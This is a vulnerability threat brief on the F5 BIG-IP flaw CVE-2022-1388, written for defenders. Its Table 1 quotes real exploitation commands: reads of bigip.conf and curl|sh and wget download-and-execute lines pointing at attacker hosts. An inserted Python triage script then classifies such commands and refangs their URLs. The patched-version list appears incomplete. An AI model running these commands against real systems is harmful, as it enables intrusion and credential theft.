Threat Brief: CVE-2022-1388


Category: Threat Brief, Vulnerability


Executive Summary

On May 4, 2022, F5 released a security advisory for a remote code execution vulnerability in the iControl REST component of its BIG-IP product, tracked as CVE-2022-1388. Threat actors can exploit this vulnerability to bypass authentication and run arbitrary code on unpatched systems. Rated 9.8 on the CVSS scale, this is a critical vulnerability that needs immediate attention. Since the advisory was released, mass scanning for unpatched systems has begun, and in-the-wild exploitation is underway.

Palo Alto Networks released a Threat Prevention signature for the F5 BIG-IP Authentication Bypass Vulnerability (92570), and within just 10 hours the signature triggered 2,552 times due to vulnerability scanning and active exploitation attempts.

Unit 42 recommends customers upgrade to the latest release of F5 BIG-IP products. Palo Alto Networks Next Generation Firewall Threat Prevention customers are protected with Signature 92570.

CVEs discussed: CVE-2022-1388

Table of Contents

Vulnerable Systems
Mitigation Actions
Observed in the Wild
Additional Resources
Indicators of Compromise

Vulnerable Systems

The F5 product vulnerable to CVE-2022-1388 is BIG-IP, in the following versions:

  • 16.1.0 - 16.1.2
  • 15.1.0 - 15.1.5
  • 14.1.0 - 14.1.4
  • 13.1.0 - 13.1.4
  • 12.1.0 - 12.1.6
  • 11.6.1 - 11.6.5

The vulnerability exists within the iControl REST framework used by BIG-IP.

Mitigation Actions

We recommend that customers update their F5 BIG-IP deployments to one of the following versions, which contain the patches that mitigate CVE-2022-1388:

  • 17.0.0
  • 13.1.5

Until you can install a patched version of BIG-IP, see the Mitigation section of the F5 security advisory for a workaround that restricts the vulnerable component to trusted networks.

Observed in the Wild

In response to the F5 security advisory, Palo Alto Networks released the Threat Prevention signature F5 BIG-IP Authentication Bypass Vulnerability (92570) on May 9.

We observed this signature triggered 2,552 times between 4:47 and 14:00 UTC on May 10. We were able to analyze 2,151 packets that triggered the signature and observed both vulnerability scanning activity and active exploitation attempts.

Table 1 shows the commands that would have been executed had exploitation succeeded. They were recovered by analyzing the packet captures that triggered the F5 BIG-IP Authentication Bypass Vulnerability signature.

Count  Command
1954   id
125    cat /config/bigip.conf
24     cat /etc/profile
19     curl -o- -L hxxp://20.239.193[.]47/| sh > /dev/null 2>&1  &
13     whoami
11     find /usr/local/www -name *.php | xargs grep eval
3      curl -fsLk hxxps://transfer[.]sh/dlxo3I/ | sh
1      wget hxxp://20.187.86[.]47/dadda;chmod 777 *;./dadda
1      curl -o- -L hxxp://20.239.193[.]47/kele1|sh

Table 1. Commands observed in CVE-2022-1388 exploitation attempts.
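For analysts triaging captures of this kind, the following added example (not part of the brief, and not Unit 42 tooling) parses rows in the shape of Table 1, groups the post-exploitation commands by what they achieve (recon, reading bigip.conf, hunting for web shells, download-and-execute) and refangs the hosting URLs for IoC ingestion. The sample rows and hosts are constructed using RFC 5737 documentation addresses, not the indicators from the brief.

```python
import re
from collections import Counter

# Constructed sample in the shape of Table 1 ("count command" rows).
# Hosts are RFC 5737 documentation addresses, not the brief's IoCs.
SAMPLE_TABLE = """\
1954 id
125 cat /config/bigip.conf
19 curl -o- -L hxxp://192.0.2.10/| sh > /dev/null 2>&1  &
11 find /usr/local/www -name *.php | xargs grep eval
3 curl -fsLk hxxps://files.example[.]net/abc/ | sh
1 wget hxxp://198.51.100.7/dadda;chmod 777 *;./dadda
"""

# Ordered rules, first match wins; categories name the attacker's goal.
RULES = [
    ("download_execute", re.compile(r"\b(curl|wget)\b.*(\|\s*sh|;\s*\./|chmod)")),
    ("config_read", re.compile(r"\bcat\s+/config/bigip\.conf\b")),
    ("webshell_hunt", re.compile(r"\bfind\b.*\.php.*\bgrep\b.*\beval\b")),
    ("recon", re.compile(r"^\s*(id|whoami|cat\s+/etc/\S+)\s*$")),
]

URL_RE = re.compile(r"hxxps?://[^\s|;'\"]+", re.IGNORECASE)

def refang(indicator: str) -> str:
    """Turn a defanged indicator (hxxp, [.]) back into its usable form."""
    return indicator.replace("hxxp", "http").replace("[.]", ".")

def classify(command: str) -> str:
    """Return the first matching category for one observed command."""
    for name, pattern in RULES:
        if pattern.search(command):
            return name
    return "other"

def triage(table_text: str):
    """Parse 'count command' rows; return per-category totals and hosting URLs."""
    totals = Counter()
    urls = set()
    for line in table_text.splitlines():
        count, _, command = line.strip().partition(" ")
        if not count.isdigit() or not command:
            continue  # skip headers, captions and blank lines
        totals[classify(command)] += int(count)
        urls.update(refang(u) for u in URL_RE.findall(command))
    return totals, sorted(urls)

if __name__ == "__main__":
    totals, urls = triage(SAMPLE_TABLE)
    print(totals.most_common(), urls)
```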


Palo Alto Networks customers receive protections against the exploitation of this vulnerability in the following ways:

  • Next-Generation Firewalls with a Threat Prevention security subscription (running Applications and Threat content update version 8567) can automatically block sessions related to this vulnerability using the F5 BIG-IP Authentication Bypass Vulnerability signature (Threat ID 92570).

Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available.

Additional Resources

K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388
EnemyBot Attempts to Exploit CVE-2022-1388

Indicators of Compromise

Payload SHA256


Source IPv4


Hosting URLs


Updated May 16, 2022